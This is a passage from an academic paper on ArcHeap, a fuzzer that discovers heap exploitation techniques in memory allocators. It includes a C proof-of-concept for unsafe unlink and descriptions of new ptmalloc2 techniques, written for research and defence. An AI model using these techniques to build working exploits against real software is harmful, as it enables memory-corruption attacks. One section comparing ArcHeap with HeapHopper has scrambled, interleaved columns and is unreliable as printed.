  *(uintptr_t*)(p[1] + 768) = 768;
  // [BUG] overflowing p[1] to make p[2]'s prev chunk freed, P=0
  *(uintptr_t*)(p[1] + 776) = 768; // ❷
  // triggering unsafe(fake) via backward consolidation
  free(p[2]); // ❸
  // assert(p[1] == (void*)&p[1] - offsetof(bk));
  // writing with p[1]: overwriting p[3] to buf
  ((uintptr_t*)p[1])[5] = (uintptr_t)buf; // ❹
  // writing with p[3]: overwrite buf[0] with 800
  ((uintptr_t*)p[3])[0] = 800; // ❺
  // assert(buf[0] == 800);

Figure 5: A PoC code of unsafe unlink found by ArcHeap that has been simplified for easier explanation. Note that this PoC is a concretization of Figure 2b.

[Figure 6 diagram: five panels (❶ to ❺), each showing the heap container and the global buffer next to their shadow memory, with ★ = (void*)&p[1] - offsetof(bk). Panel ❸: Discrepancy after free() - Restricted write in the heap container. Panel ❹: Divergence after heap write - Arbitrary write in the heap container. Panel ❺: Divergence after heap write - Arbitrary write in the global buffer.]
Figure 6: Shadow memory states in Figure 5. Black circles in left top corner represent locations in the code of states. Gray-color boxes show divergence between original memory and its shadow memory. Using this information, ArcHeap can detect exploitation techniques.
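The divergence check that Figure 6 illustrates can be sketched as a comparison between a container and its shadow copy. The following is a minimal illustration under stated assumptions, not ArcHeap's implementation: the fixed four-slot container, `tracked_store`, and `classify_divergence` are hypothetical names, and the choice between ARBITRARY_WRITE and RESTRICTED_WRITE follows the comment on check_shadow() in Figure 4.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define SLOTS 4 /* assumed container capacity for this sketch */

typedef enum { NO_IMPACT, RESTRICTED_WRITE, ARBITRARY_WRITE } impact;

static void *container[SLOTS]; /* visible to the allocator under test */
static void *shadow[SLOTS];    /* replica used only for comparison */

/* A legitimate update is mirrored into both copies. */
void tracked_store(size_t i, void *p) {
    assert(i < SLOTS);
    container[i] = shadow[i] = p;
}

/* Compare the container with its shadow after an action.
 * after_write is nonzero when the action was a heap or buffer write,
 * and zero when it was an allocation or deallocation. */
impact classify_divergence(int after_write) {
    if (memcmp(container, shadow, sizeof container) == 0)
        return NO_IMPACT;
    /* Resynchronize so the same divergence is not reported twice. */
    memcpy(shadow, container, sizeof container);
    return after_write ? ARBITRARY_WRITE : RESTRICTED_WRITE;
}
```

In this sketch, a direct assignment to `container[i]` that bypasses `tracked_store` stands in for a corruption performed by the allocator's internal logic, such as the unlink in state ❸.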

it is not multiplied by a constant because it is the pointer type. Similar to deallocation, ArcHeap writes data only in a valid heap region (i.e., no overflow or underflow) to ensure legitimacy of an action (Line 33).

Bug invocation. To explore heap exploitation techniques in the presence of heap vulnerabilities, ArcHeap needs to conduct buggy actions. Currently, ArcHeap handles six bugs in heap: (1) overflow, (2) write-after-free, (3) off-by-one overflow, (4) off-by-one NULL overflow, (5) double free, and (6) arbitrary free. ArcHeap performs only one of these bugs for a technique to limit the power of an adversary as described in the threat model (see §3.2). Also, ArcHeap allows repetitive execution of the same bug to emulate the situation in which an attacker re-triggers the bug.

ArcHeap deliberately builds a buggy action to ensure its occurrence. For overflow and off-by-one, ArcHeap uses the malloc_usable_size API to get the actual heap size to ensure overflow. This is necessary since the request size could be smaller than the actual size due to alignment or the minimum size constraint. Particularly for ptmalloc2, ArcHeap uses a dedicated single-line routine to get the actual size since ptmalloc2's malloc_usable_size() is inaccurate in the presence of memory corruption bugs. Moreover, in double free and write-after-free bugs, ArcHeap checks whether a target chunk is already freed. If it is not freed yet, ArcHeap ignores this buggy action and waits for the next one.

Model specifications. A user can optionally provide a model specification either to direct ArcHeap to focus on a certain type of exploitation techniques or to restrict the conditions for a target environment. It accepts five types of model specification: chunk sizes, bugs, impacts, actions, and knowledge. The first four types are self-explanatory, and knowledge is about the ability of an attacker to break ASLR (i.e., prior knowledge of certain addresses). The user can specify three types of addresses that an attacker may know: a heap address, the global buffer address, and the container address. Such knowledge will affect future data generation by ArcHeap, as shown in Table 5.

5.3 Detecting Techniques by Impact

ArcHeap detects four types of impacts of exploitation that are the building blocks of a full chain exploit: arbitrary-chunk (AC), overlapping-chunk (OC), arbitrary-write (AW), and restricted-write (RW). This approach has two benefits, namely, expressiveness and performance. These types are useful in developing control-hijacking, the ultimate goal of an attacker. Thus, all existing techniques lead to one of these types, i.e., can be represented by these types. Also, detecting the existence of these types causes only small performance overheads with a simple data structure shadowing the heap space.

(1) To detect AC and OC, ArcHeap determines any overlapping chunks in each allocation (Line 18 in Figure 4). To make the check safe, it replicates the address and size of a chunk right after malloc since they could be corrupted when a buggy action is executed. Using the stored addresses and sizes, it can quickly check if a chunk overlaps with its data structure (AC) or other chunks (OC).

(2) To detect AW and RW, ArcHeap safely replicates its data structures, the containers and the global buffer, using the technique called shadow memory. During execution, ArcHeap synchronizes the state of the shadow memory whenever it performs actions that can modify its internal structures: allocations for the container and buffer writes for the global buffer (Lines 21, 49). Then, ArcHeap checks the divergence of the shadow memory when performing any action (Lines 17, 29, 43, 50). Because of the explicit consistency maintained by ArcHeap, divergence can only occur when previously executed actions modify ArcHeap's data structures via an internal operation of the heap allocator. Later, these actions can be reformulated to modify sensitive data of
an application instead of the data structure for exploitation.

ArcHeap's fuzzing strategies (Table 5) make this detection efficient by limiting its analysis scope to its data structures. In general, a heap exploit technique can corrupt any data, which would require scanning the entire memory space. However, a technique found by ArcHeap can only modify the heap or the data structures because these are the only addresses visible to its fuzzing strategies. ArcHeap checks only modifications to its data structures and ignores those in the heap because it is hard to distinguish a legitimate one (e.g., modifying metadata in deallocation) from an abusing one (i.e., a heap exploit technique) without a deep understanding of an allocator. This is semantically equivalent to monitoring the violation of the implicit invariant of an allocator: it should not modify memory that is not under its control.

ArcHeap distinguishes AW from RW based on the heap actions that introduce divergence. If a divergence occurs in allocation or deallocation, it concludes RW; otherwise (i.e., in heap or buffer write), it concludes AW. The underlying intuition is that parameters in the former actions are hard to control arbitrarily, but not in the latter ones. After detecting divergence, ArcHeap copies the original memory to its shadow to stop repeated detections.

A running example. Figure 6 shows the state of the shadow memory when executing Figure 5. ❶ After the first allocation, ArcHeap updates its heap container and corresponding shadow memory to maintain their consistency, which might be affected by the action. ❷ It performs two more allocations and so updates the heap container and shadow memory accordingly. ❸ After deallocation, p[1] is changed into ★ due to unlink() in ptmalloc2 (Figure 2a). At this point, ArcHeap detects divergence of the shadow memory from the original heap container. Since this divergence occurs during deallocation, the impact of exploitation is limited to restricted writes in the heap container. ❹ In this case, since the heap write causes the divergence, the actions can trigger arbitrary writes in the heap container. ❺ Since this heap write introduces divergence in the global buffer, the actions can lead to arbitrary write in the global buffer.

5.4 Generating PoC via Delta-Debugging

To find the root cause of exploitation, ArcHeap refines test cases using delta-debugging [76], as shown in Algorithm 1. The algorithm is simple in concept: for each action, ArcHeap re-evaluates the impact of exploitation of the test case without it. If the impacts of the original and new test cases are equal, it considers the excluded action redundant (i.e., it has no meaningful effect on the exploitation). The intuition behind this decision is that many actions are independent (e.g., buffer writes and heap writes) so that the delta-debugging can clearly separate non-essential actions from the test case. Our current algorithm is limited to evaluating one individual action at a time. It can be easily extended to check a sequence or a combination of heap actions together, but our evaluation shows that the current scheme using a single action is effective enough for practical uses: it eliminates 84.3% of non-essential actions on average (see §8.3).

Algorithm 1: Minimize actions that result in an impact of exploitation
  Input: actions – actions that result in an impact
  1 origImpact ← GetImpact(actions)
  2 minActions ← actions
  3 for action ∈ actions do
  4   tempActions ← minActions − action
  5   tempImpact ← GetImpact(tempActions)
  6   if origImpact = tempImpact then
  7     minActions ← tempActions
  8   end
  9 end
  Output: minActions – minimized actions that result in the same impact

Once minimized, ArcHeap converts the encoded test case to a human-understandable PoC like that in Figure 5 using one-to-one mapping between each action and C code (e.g., an allocation action → malloc()).

6 Implementation

We extended American Fuzzy Lop (AFL) to run our heap action generator that randomly executes heap actions. The generator sends a user-defined signal, SIGUSR2, if it finds actions that result in an impact of exploitation. We also modified AFL to save crashes only when it gets SIGUSR2 and to ignore other signals (e.g., segmentation fault), which are not interesting in finding techniques. We carefully implemented the generator not to call heap APIs implicitly except for the pre-defined actions, so that the actions can be reproduced. For example, the generator uses the standard error for its logging instead of standard out, which calls malloc internally for buffering. To prevent the accidental corruption of internal data structures, the generator allocates its data structures at random addresses. Thus, the bug actions such as overflow cannot modify the data structures since they will not be adjacent to heap chunks.

7 Applications

7.1 New Heap Exploitation Techniques

This section discusses the new exploitation techniques that ArcHeap found in ptmalloc2 during our evaluation. Compared to the old techniques, we determine their uniqueness in two aspects: root causes and capabilities, as shown in Table 6. More information (e.g., elapsed time or models) can be found in §8. To share new attack vectors in ptmalloc2, the techniques are reported and under review in how2heap [61], the de-facto standard for exploitation techniques. Most PoC codes are available in Appendix A.

Unsorted bin into stack (UBS). This technique overwrites the unsorted bin to link a fake chunk so that it can return the address of the fake chunk (i.e., an arbitrary chunk). This is similar to house of lore [7], which corrupts a small bin to
achieve the same attack goal. However, the unsorted bin into stack technique requires only one kind of allocation, unlike house of lore, which requires two different allocations, to move a chunk into a small bin list. This technique has been added to how2heap [61].

  New  Old  Root Causes             New Capability
  UBS  HL   Unsorted vs. Small      Only need one size of an object
  HUE  HE   Unsorted vs. Free       Does not require a heap address
  UDF  FD   Small vs. Fast          Can abuse a small bin with more checks
  OCS  OC   Small vs. Unsorted      Does not need a controllable allocation
  FDO  FD   Consolidation vs. Fast  Can allocate a non-fast chunk

Table 6: New techniques found by ArcHeap in ptmalloc2, which have different root causes and capabilities from old ones.

House of unsorted einherjar (HUE). This is a variant of house of einherjar, which uses an off-by-one NULL byte overflow and returns an arbitrary chunk. In house of einherjar, attackers should have prior knowledge of a heap address to break ASLR. However, in house of unsorted einherjar, attackers can achieve the same effect without this pre-condition. We named this technique house of unsorted einherjar, as it interestingly combines two techniques, house of einherjar and unsorted bin into stack, to relax the requirement of the well-known exploitation technique.

Unaligned double free (UDF). This is an unconventional technique that abuses double free in a small bin, which is typically considered a weak attack surface thanks to comprehensive security checks. To avoid security checks, a victim chunk for double free should have proper metadata and be tricked into appearing in use (i.e., the P bit of the next chunk is one). Since double free doesn't allow arbitrary modification of metadata, existing techniques only abuse a fast bin or tcache, which have weaker security checks than a small bin (e.g., fast-bin-dup in Table 4).

Interestingly, unaligned double free bypasses these security checks by abusing the implicit behaviors of malloc(). First, it reuses the old metadata in a chunk since malloc() does not initialize memory by default. Second, it fills freed space before the next chunk to make the P bit of the chunk one. As a result, the technique can bypass all security checks and can successfully craft a new chunk that overlaps with the old one.

Overlapping chunks using a small bin (OCS). This is a variant of overlapping-chunks (OC) that abuses the unsorted bin to generate an overlapping chunk, but this technique crafts the size of a chunk in a small bin. Unlike OC, it requires more actions (three more malloc() and one more free()) but doesn't require attackers to control the allocation size. When attackers cannot invoke malloc() with an arbitrary size, this technique can be effective in crafting an overlapping chunk for exploitation.

Fast bin into other bin (FDO). This is another interesting technique that allows attackers to return an arbitrary address: it abuses consolidation to convert the type of a victim chunk from the fast bin to another type. First, it corrupts a fast bin free list to insert a fake chunk. Then, it calls malloc_consolidate() to move the fake chunk into the unsorted bin during the deallocation process. Unlike other techniques related to the fast bin, this fake chunk does not have to be in the fast bin. We exclude this PoC due to space limits, but it is available in our repository.

                                  Impacts of exploitation
  Allocators             P  I  |  OC              | AC         | RW         | AW
  dlmalloc-2.7.2         ✓  ✓  |  OV, WF, DF (N)  | AF, OV, WF | AF, OV, WF | AF, OV, WF
  dlmalloc-2.8.6         ✓  ✓  |  OV, WF, DF (N)  | OV (N)     | OV
  musl-1.1.9             ✓  ✓  |  OV, WF, DF (N)  | AF, OV, WF | AF, OV, WF | AF, OV, WF
  musl-1.1.24            ✓  ✓  |  OV, WF, DF      | AF, OV, WF | AF, OV, WF | AF, OV, WF
  jemalloc-5.2.1               |  DF
  tcmalloc-2.7              ✓  |  OV, DF          | OV, WF, DF | OV         | OV
  mimalloc-1.0.8            ✓  |  OV, WF, DF      | OV, WF     | WF
  mimalloc-secure-1.0.8     ✓  |  DF
  DieHarder-5a0f8a52           |  DF
  mesh-a49b6134                |  DF, NO
  N: New techniques compared to the related work, HeapHopper [17]; only top three allocators matter. NO: No bug is required, i.e., incorrect implementations. I: In-place metadata, P: ptmalloc2-related allocators.

Table 7: Summary of exploit techniques found by ArcHeap in real-world allocators with their version or commit hash.

7.2 Different Types of Heap Allocators

We also applied ArcHeap to 10 different allocators with various versions. First, we tested dlmalloc 2.7.2, dlmalloc 2.8.6 [41], and musl [59] 1.1.9, which were used in the related work, HeapHopper [17]. Moreover, we tested other real-world allocators: the latest version of musl (1.1.24), jemalloc [19], tcmalloc [26], Microsoft mimalloc [43] with its default and secure mode (noted as mimalloc-secure), and LLVM Scudo [45]. Furthermore, we evaluated allocators from academia: DieHarder [49], Mesh [56], FreeGuard [64], and Guarder [65]. Applying ArcHeap to other allocators was trivial; we leveraged LD_PRELOAD to use a new allocator.

Under the assumption that internal details of the allocators are unknown, we ran ArcHeap with four models specifying each impact (i.e., OC, AC, RW, and AW) one by one to exhaustively explore possible techniques. After 24 hours of evaluation, it found several exploit techniques in seven out of 10 allocators; the exceptions were Scudo, FreeGuard, and Guarder, due to their secure design. We also tested ArcHeap with custom allocators from DARPA Cyber Grand Challenge, whose results can be found in §A.1.

As shown in Table 7, ArcHeap discovers various exploitation techniques for ptmalloc2-related allocators: dlmalloc, the ancestor of ptmalloc2, and musl, a libc implementation in embedded systems inspired by dlmalloc. In dlmalloc 2.7.2, dlmalloc 2.8.6, and musl 1.1.9, ArcHeap not only re-discovered all techniques found by HeapHopper, but also newly found the following facts: 1) these allocators are all vulnerable to double free, and 2) an arbitrary chunk is still achievable through overflow in dlmalloc-2.8.6. This was hidden in HeapHopper due to its limitation in handling symbolic-size allocation. Note that we merged special cases of overflow (O1, O1N) into OV to be consistent with HeapHopper [17], and our claims for new techniques are very conservative; we claim discovery of new techniques only when HeapHopper cannot find equivalent or more powerful ones (e.g., AC is more powerful than OC). We further compare ArcHeap with HeapHopper in §8.1. ArcHeap also found that musl
has no security improvement in the latest version; all techniques in musl 1.1.9 are still working in 1.1.24.

ArcHeap also successfully found several heap exploit techniques in allocators that are dissimilar to ptmalloc2 (see Table 7) for the following reasons. First, ArcHeap's model, which is based on the common designs in allocators (§2.1), is generic enough to cover non-ptmalloc allocators. For example, tcmalloc [26] targets high performance computing, resulting in a very different design from ptmalloc2's (e.g., heavy use of thread-local cache). However, tcmalloc still follows our model: its metadata are placed in the head of a chunk (in-place metadata) and consist of linked list pointers (cardinal data). Thus, ArcHeap can find several techniques in tcmalloc including one that can lead to an arbitrary chunk using overflow (see Figure A.2). It is worth emphasizing that our model only depends on metadata's appearance, not on their generation or management, which introduce more variety in design, making generalization difficult. Second, thanks to standardized APIs, ArcHeap can find exploit techniques even in allocators that deviate from our model (e.g., jemalloc). In particular, ArcHeap discovered techniques that are reachable only using APIs (e.g., double free) although the allocators have removed in-place metadata for security.

ArcHeap helps to find implementation bugs in allocators by showing unexpected exploit primitives in secure allocators or primitives that can be invoked without a bug. Accordingly, ArcHeap found three bugs in mimalloc-secure, DieHarder, and Mesh. We reported our findings to the developers; two of them got acknowledged and are patched. It is worth mentioning that our auto-generated PoC has been added to mimalloc as its regression test. In the following, we discuss each issue that ArcHeap found.

DieHarder, mimalloc-secure: memory duplication in large chunks using double free. ArcHeap found a technique that allows the duplication of large chunks (more than 64K bytes) in the well-known secure allocators, DieHarder and mimalloc-secure. Interestingly, even though the allocators have no direct relationship according to the developer of mimalloc [43], ArcHeap found that both allocators are vulnerable to this technique. Their root causes are also distinct: DieHarder misses verifying its chunk's status when allocating large chunks, unlike for smaller chunks, and mimalloc checked the status of an incorrect block. ArcHeap successfully found this corner case without having any hint about the internals of the allocators using its randomized exploration. PoC is available in Figure A.3.

Mesh: memory duplication using allocations with negative sizes. ArcHeap found that if an attacker allocates an object with negative size, Mesh will return the same chunk twice (i.e., duplication) instead of NULL.

7.3 Evolution of Security Features

We applied ArcHeap to four versions of ptmalloc2 distributed in Ubuntu LTS: precise (12.04, libc 2.15), trusty (14.04, libc 2.19), xenial (16.04, libc 2.23), and bionic (18.04, libc 2.27). In trusty and xenial, a new security check that verifies the integrity of size metadata (see (1) in Figure 2a) is backported by the Ubuntu maintainers. To compare each version, we perform differential testing: we first apply ArcHeap to each version and generate PoCs. Then, we validate the generated PoCs from one version against other versions (see Figure 7).

[Figure 7 plot omitted.]
Figure 7: The number of working PoCs from one source LTS in various Ubuntu LTS. For example, 56 PoCs were generated from precise, 49 of them work in trusty and xenial, and 45 of them work in bionic.

We identified three interesting trends that cannot be easily obtained without ArcHeap's automation. First, a new security check successfully mitigates a few exploitation techniques found in an old version of ptmalloc2: likely, the libc maintainer reacts to a new, popular exploitation technique. Second, an internal design change in bionic rendered most PoCs generated from previous versions ineffective. This indicates the subtleties of the generated PoCs, requiring precise parameters and the orders of API calls for successful exploitation. However, this does not particularly mean that a new version, bionic, is secure; the new component, tcache, indeed makes exploitation much easier, as Figure 7 shows. Third, this new component, tcache, which is designed to improve the performance [15], weakens the security of the heap allocators, not just making it easy to attack but also introducing new exploitation techniques. This is similarly observed by other researchers and communities [17, 37].

8 Evaluation

This section tries to answer the following questions:
1. How effective is ArcHeap in finding new exploitation techniques compared to the state-of-the-art technique, HeapHopper?
2. How exhaustively can ArcHeap explore the security-critical state space?
3. How effective is delta-debugging in removing redundant heap actions?

Evaluation setup. We conducted all the experiments on Intel Xeon E7-4820 with 256 GB RAM. For seeding, we used 256 random bytes that are used to indicate a starting point of the state exploration and are not critical, as ArcHeap tends to converge during the state exploration.

8.1 Comparison to HeapHopper

HeapHopper [17] was recently proposed to analyze existing exploitation techniques in varying implementations of an allo-
Name Bug Impact Chunks # Txn Size TxnList (A list of transactions) 1 New techniques
FD WF AC Fast 8 {8} M-M-F-WF-M-M
Name Bug Impact Chunks # Txn A RC H EAP HeapHopper
UU O1 AW,RW Small 6 {128} M-M-O1-F
HS AF AC Fast 4 {48} AF-M T F O µ σ T F O µ σ
PN O1N OC Small 12 {128,256,512} M-M-M-F-O1N-M-M-F-F-M FDO WF AC Fast, Large —
HL WF AC Small 9 {100,1000} M-M-F-M-WF-M-M
OC O1 OC Small 8 {120,248,376} M-M-M-F-O1-M UBS WF AC Small 6 3† 0 0 20.2m 5m 0 0 3 ∞ -
UB WF AW,RW Small 7 {400} M-M-F-WF-M
HE O1 AC Small 7 {56,248,512} M-M-O1-F-M HUE O1 AC Small 9 2‡ 0 1 14.4h 8.9h 0 0 3 ∞ -
OCS OV OC Small 9 3 0 0 17.3s 1.2s 0 0 3 ∞ -
# Txn: The number of transactions, M: malloc, F: free UDF DF OC Small 9 3 0 0 19.9s 5.2s 0 0 3 ∞ -
Found 11 0 1 ⇒ #4 0 0 12 ⇒ #0
Table 8: Exploit-specific models for known techniques from
T: True positives, F: False positives, O: Timeout,
HeapHopper. It is worth noting that the results of variants (i.e., µ: Average time, σ : Standard deviation of time
techniques have same prerequisites, but different root causes) are
identical for A RC H EAP with no specific model (marked with † and Table 9: The number of experiments (at most three) that discover
‡ in Table 9 and Table 10) since A RC H EAP neglects the number of new exploitation techniques, the number of found techniques — the
transactions (i.e., # Txn). number after hash (#) sign, elapsed time, and corresponding models.
Briefly, A RC H EAP discovered all four techniques, but HeapHopper
failed to. We omitted FDO, which has a superset model of FD;
cator. Because of its goal, HeapHopper emphasizes complete- therefore, it becomes indistinguishable to FD (see, Table 8).
ness and verifiability, differentiating its method (i.e., symbolic
execution) from A RC H EAP’s (i.e., fuzzing). To overcome the
periment, FDO is excluded because its model is a superset of
state explosion in symbolic execution, HeapHopper tightly
FD; having FDO simply makes A RC H EAP and HeapHopper
encodes the prior knowledge of exploit techniques into its
converge to FD.
models, e.g., the number of transactions (i.e., non-write ac-
HeapHopper fails to identify all unknown exploitation prim-
tions in A RC H EAP), allocation sizes (i.e., guiding the use of
itives with no exploit-specific models (see Table 9). In fact,
specific bins), and even a certain order of transactions. By
it encounters a few fundamental problems of symbolic ex-
relying on this model, it could incrementally perform the
ecution: 1) exponentially growing permutations of transac-
symbolic execution for all permutations of transactions. Un-
tions and 2) huge search spaces in selecting proper size and
fortunately, its key idea—guiding the state exploration with
orders to trigger exploitation. Although HeapHopper demon-
detailed models— limits its capability to only its original
strated a successful state exploration of seven transactions
purpose that validates known exploitation techniques, unlike
with three size parameters (§7.1 in [17]), the search space
our approach can find unknown techniques.
required for discovering new techniques is much larger, ren-
Despite their different purposes, their outputs are equiva- dering HeapHopper’s approach computationally infeasible.
lent to heap exploitation techniques; therefore, we need to On the contrary, A RC H EAP successfully explores the search
show the orthogonality of A RC H EAP and HeapHopper; nei- space using the random strategies, and indeed discovers un-
ther of them can replace the other. To objectively compare known techniques.
both approaches, we performed three experiments: 1 finding
unknown techniques with no exploit-specific model (i.e., ap- 2 Known techniques with partly specified models. We
plying HeapHopper to A RC H EAP’s task), 2 finding known also evaluate the role of exploit-specific models in both ap-
techniques with partly specified models (i.e., evaluating the proaches, which are unavailable in finding new techniques.
roles of specified models in each approach), and 3 finding In particular, we evaluated both systems with partial mod-
known techniques with exploit-specific models (i.e., applying els, namely, the size parameters (+Size) and a sequence of
A RC H EAP to HeapHopper’s task). In the experiments, we transactions (+TxnList), used in HeapHopper (see, Table 8).
considered variants of exploit techniques1 as an equal class To prevent each system from converging to easy-to-find tech-
since both systems cannot distinguish their subtle differences. niques, we tested each model on top of the baseline heap
We ran each experiment three times with a 24-hour timeout model (i.e., Bug+Impact+Chunks).
for proper statistical comparison [40]. We used the default This experiment (i.e., 2 in Table 10) shows that A RC H EAP
option for HeapHopper since it shows the best performance outperforms HeapHopper with no or partly specified models:
in the following experiments (see §A.2). A RC H EAP found five more known techniques than HeapHop-
per in both +Size and Bug+Impact+Chunks. Interestingly,
1 New techniques. We first check if HeapHopper’s ap-
A RC H EAP can operate worse with additional information;
proach can be used to find previously unknown exploita-
A RC H EAP found three fewer techniques in +TxnList. Un-
tion techniques that A RC H EAP found (see, §7.1). To apply
like A RC H EAP, exploit-specific models are beneficial to
HeapHopper, we provided models that specify all sizes for
HeapHopper, finding one more techniques when +TxnList
corresponding bins but limit the number of transactions fol-
is given. This result shows that a precise model plays an
lowing our PoCs, as shown in Table 9. Note that, in theory,
essential role in symbolic execution but not in fuzzing. In
such relaxation is general enough to discover new techniques
short, A RC H EAP is particularly preferable when exploring
given an infinite amount of computing resources. In the ex-
unknown search space, (i.e., finding new techniques), where
1 Exploit an accurate model is inaccessible.
techniques often have the same prerequisite but different root
causes such as UBS and HL. 3 Known techniques with exploit-specific models When
(2) Known techniques with partly specified models

Model: Bug+Impact+Chunks
        ArcHeap                        HeapHopper
Name    T    F   O    µ       σ        T    F   O    µ       σ
FD      3    0   0    2.7m    1.2m     3    0   0    3.8m    0.3s
UU      3    0   0    57.9m   40.4m    0    0   3    ∞       -
HS      3    0   0    2.7m    59.7s    3    0   0    31.4s   0.2s
PN      3    0   0    13.3m   24.4s    0    0   3    ∞       -
HL      3†   0   0    20.2m   5m       0    0   3    ∞       -
OC      3    0   0    7.1s    5.9s     0    0   3    ∞       -
UB      3    0   0    36.8s   22.8s    3    0   0    21.8s   0.2s
HE      2‡   0   1    14.4h   8.9h     0    0   3    ∞       -
Found   23   0   1    ⇒ #8             9    0   15   ⇒ #3

Model: +Size
        ArcHeap                        HeapHopper
Name    T    F   O    µ       σ        T    F   O    µ       σ
FD      3    0   0    57.1s   27.1s    3    0   0    3.8m    0.9s
UU      3    0   0    1.6h    1.1h     0    0   3    ∞       -
HS      3    0   0    9.3m    6.1m     3    0   0    31.1s   0.2s
PN      3    0   0    16.1m   14.9m    0    0   3    ∞       -
HL      3    0   0    1.2m    47.3s    0    0   3    ∞       -
OC      3    0   0    20s     5.3s     0    0   3    ∞       -
UB      3    0   0    4.7s    3.1s     3    0   0    21.9s   0.3s
HE      2    0   1    9.3h    10.4h    0    0   3    ∞       -
Found   23   0   1    ⇒ #8             9    0   15   ⇒ #3

Model: +TxnList
        ArcHeap                        HeapHopper
Name    T    F   O    µ       σ        T    F   O    µ       σ
FD      3    0   0    14.2m   4.3m     3    0   0    10.7m   2.1m
UU      0    0   3    ∞       -        0    3   0    3.2h    26.3m
HS      0    0   3    ∞       -        3    0   0    56s     0.8s
PN      3    0   0    1.6h    57m      0    0   3    ∞       -
HL      2    0   1    13.2h   8.5h     0    0   3    ∞       -
OC      3    0   0    6s      2.4s     3    0   0    22.1h   33.2m
UB      3    0   0    24.8s   14.9s    3    0   0    47.6s   0.3s
HE      0    0   3    ∞       -        0    0   3    ∞       -
Found   14   0   10   ⇒ #5             12   3   9    ⇒ #4

(3) Known techniques with exploit-specific models

Model: +Size, TxnList
        ArcHeap                        HeapHopper
Name    T    F   O    µ       σ        T    F   O    µ       σ
FD      3    0   0    10.2m   7.2m     3    0   0    23.5s   0.2s
UU      0    0   3    ∞       -        0    3   0    8.2h    13m
HS      0    0   3    ∞       -        3    0   0    28.6s   0.2s
PN      3    0   0    26m     12.6m    3    0   0    4.3m    1.6s
HL      3    0   0    21m     9.4m     2    1   0    2.2m    8.2s
OC      3    0   0    26.6s   34s      3    0   0    3.2m    2s
UB      3    0   0    12.6s   9.5s     3    0   0    19.5s   0.7s
HE      0    0   3    ∞       -        0    3   0    6.8m    6.4s
Found   15   0   9    ⇒ #5             17   7   0    ⇒ #6

Table 10: The number of discovered known exploitation techniques and elapsed time for discovery in ArcHeap and HeapHopper with various models. In summary, ArcHeap outperforms HeapHopper with no or partly specified models, e.g., ArcHeap found five more techniques with no specific model (Bug+Impact+Chunks). Even though HeapHopper found one more technique than ArcHeap if exploit-specific models are available, it suffers from false positives (marked in gray).
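As a reading aid for the Found row of Table 10, the following minimal sketch recomputes it for the baseline model (Bug+Impact+Chunks). It assumes that the number after the hash sign counts the techniques with at least one true positive among the three runs; that reading is our interpretation of the table, not a definition stated in the text. The names ARCHEAP_BASELINE, HEAPHOPPER_BASELINE, and found_row are hypothetical and used only for illustration.

```python
# (T, F, O) outcomes over three runs per known technique, copied from the
# Bug+Impact+Chunks columns of Table 10. The dictionary names are illustrative.
ARCHEAP_BASELINE = {
    "FD": (3, 0, 0), "UU": (3, 0, 0), "HS": (3, 0, 0), "PN": (3, 0, 0),
    "HL": (3, 0, 0), "OC": (3, 0, 0), "UB": (3, 0, 0), "HE": (2, 0, 1),
}
HEAPHOPPER_BASELINE = {
    "FD": (3, 0, 0), "UU": (0, 0, 3), "HS": (3, 0, 0), "PN": (0, 0, 3),
    "HL": (0, 0, 3), "OC": (0, 0, 3), "UB": (3, 0, 0), "HE": (0, 0, 3),
}


def found_row(results):
    """Return (total T, total F, total O, number of techniques found).

    Assumption: a technique counts as found if at least one of its
    three runs was a true positive.
    """
    total_t = sum(t for t, _, _ in results.values())
    total_f = sum(f for _, f, _ in results.values())
    total_o = sum(o for _, _, o in results.values())
    found = sum(1 for t, _, _ in results.values() if t > 0)
    return total_t, total_f, total_o, found


if __name__ == "__main__":
    print("ArcHeap   :", found_row(ARCHEAP_BASELINE))
    print("HeapHopper:", found_row(HEAPHOPPER_BASELINE))
```

Under this assumption, the two tuples can be compared directly with the Found row of the baseline model; the same function applies to the other three models once their columns are transcribed.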

exploit-specific models (+Size, TxnList) are provided, HeapHopper's approach works better: it found one more known technique and found four techniques more quickly than ArcHeap (see (3) in Table 10). This shows the strength of HeapHopper in validating existing techniques, demonstrating the orthogonality of the two tools. We observed one interesting behavior of HeapHopper in this experiment. With more exploit models specified, HeapHopper tends to suffer from false positives because of its internal complexity, as noted in the paper [17]. Although their number is small (dozens in three experiments), this shows incorrectness in HeapHopper, resulting in failures to find UU and HE. We confirmed these false positives with HeapHopper's authors. On the contrary, ArcHeap's approach does not introduce false positives thanks to its straightforward analysis at runtime.

This experiment also highlights an interesting design decision of ArcHeap: separating the exploration and reducing phases. With no exploit-specific guidance, ArcHeap can freely explore the search space for finding heap exploitation techniques, and so increase the probability of satisfying the precondition of certain exploitation techniques. For example, if the sequence of transactions of UU (M-M-O1-F) is enforced, ArcHeap should craft a fake chunk within a relatively small period (i.e., between four actions) to trigger the exploit; otherwise, ArcHeap has a higher probability of formulating a fake chunk by executing more, perhaps redundant, actions. However, such redundancy is acceptable in ArcHeap thanks to our minimization phase, which effectively removes inessential actions from the found exploit.

We also confirmed that ArcHeap can find all tcache-related techniques [37] and house-of-force, which HeapHopper fails to find because of an arbitrary size allocation. ArcHeap can find these techniques within a few minutes, as they require fewer than five transactions.

8.2 Security Check Coverage

To show how exhaustively ArcHeap explores the security-sensitive part of the state space, we counted the number of security checks in ptmalloc2 executed by ArcHeap. In 24 hours of exploration, ArcHeap executed 18 out of 21 security checks of ptmalloc2: it failed to cover C2, C4, and C21 in Table 11. We note that C21 is related to a concurrency bug, which is outside of the scope of this work. C2 and C4 require a strict relationship between large chunks (e.g., the sizes of two chunks are not equal but less than the minimum size), which is probably too stringent for any randomization-based strategies.

Name  Error message                                     Version  Xenial Bionic
C1    corrupted double-linked list                      2.3.4    ✓ ✓
C2    corrupted double-linked list (not small)          2.21     ✓
C3    free(): corrupted unsorted chunks                 2.11     ✓ ✓
C4    malloc(): corrupted unsorted chunks 1             2.11
C5    malloc(): corrupted unsorted chunks 2             2.11     ✓ ✓
C6    malloc(): smallbin double linked list corrupted   2.11     ✓ ✓
C7    free(): invalid next size (fast)                  2.3.4    ✓ ✓
C8    free(): invalid next size (normal)                2.3.4    ✓ ✓
C9    free(): invalid size                              2.4      ✓ ✓
C10   malloc(): memory corruption                       2.3.4    ✓ ✓
C11   double free or corruption (!prev)                 2.3.4    ✓ ✓
C12   double free or corruption (fasttop)               2.3.4    ✓ ✓
C13   double free or corruption (top)                   2.3.4    ✓ ✓
C14   double free or corruption (out)                   2.3.4    ✓ ✓
C15   malloc(): memory corruption (fast)                2.3.4    ✓ ✓
